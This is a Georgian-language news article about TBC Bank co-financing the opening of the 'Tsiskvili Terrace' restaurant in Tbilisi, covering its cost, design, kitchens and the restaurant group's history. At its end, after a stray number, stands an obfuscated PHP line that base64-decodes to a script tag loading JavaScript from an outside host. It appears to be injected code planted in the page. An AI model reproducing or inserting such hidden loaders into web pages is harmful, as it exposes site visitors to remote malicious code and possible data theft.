celsiusi
ავერსი საქკაბელი

 თიბისის მხარდაჭერით, ზვიად გამსახურდიას სახელობის სანაპიროზე #80-ში, „წისქვილი ჯგუფის“ რიგით მე-8 რესტორანი - „წისქვილი ტერასა“ გაიხსნა, რომელიც სტუმრების მასპინძლობისათვის უკვე მზადაა.

პროექტის ჯამური ღირებულება 2,5 მილიონი ლარია, საიდანაც თიბისის თანამონაწილეობა 2 მილიონ ლარს შეადგენს.

ახალი რესტორანი მთავარ დარბაზს სცენით, გამწვანებულ ტერასას, საზაფხულო ბარსა და ვიტრაჟულ სივრცეებს აერთიანებს.

„წისქვილი ტერასას“ დიზაინში გამოყენებულია ბუნებრივი მასალები - თიხა და ხე. ასევე, ლითონის დეტალები და მცენარეები.

რესტორანში მოწყობილია სხვადასხვა ტიპის ღია სამზარეულოები, სადაც მომზადდება როგორც ქართული ტრადიციული კერძები, ისე რესტორნის ბრენდ შეფის - ალექს ნათაძის საავტორო და სეზონური კერძები.

სამზარეულოში განთავსებულია როგორც მაყალი, ისე დახურული და ღია ტიპის გრილები – Josperi და Parrilla. იტალიიდან ჩამოტანილ ღუმელში კი ცომეული გამოცხვება.

თიბისი „წისქვილი ჯგუფის“ ზრდისა და განვითარების მხარდამჭერია ჯგუფის დაარსების დღიდან. პირველი რესტორანი - „ეთნო წისქვილი“ 2002 წელს გაიხსნა, რომელიც დღეს ქართული ტრადიციული რესტორნების ყველაზე მსხვილი ქსელია საქართველოში და თბილისსა და მის შემოგარენში 8 რესტორანს აერთიანებს: „ეთნო წისქვილს“, „ლუდის მოედანს“, „ღვინის ეზოს“, “წისქვილს მცხეთაში”, „წისქვილს ვაკეში“, „წისქვილს წყნეთში“ და „წისქვილი ტერასას“. ასევე, კომპანიის მფლობელობაშია მულტიფუნქციური სივრცე „თეატრი“ და პრემიუმ პროდუქტების ორი მარკეტი „წისქვილი ბაზარი“.

131
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");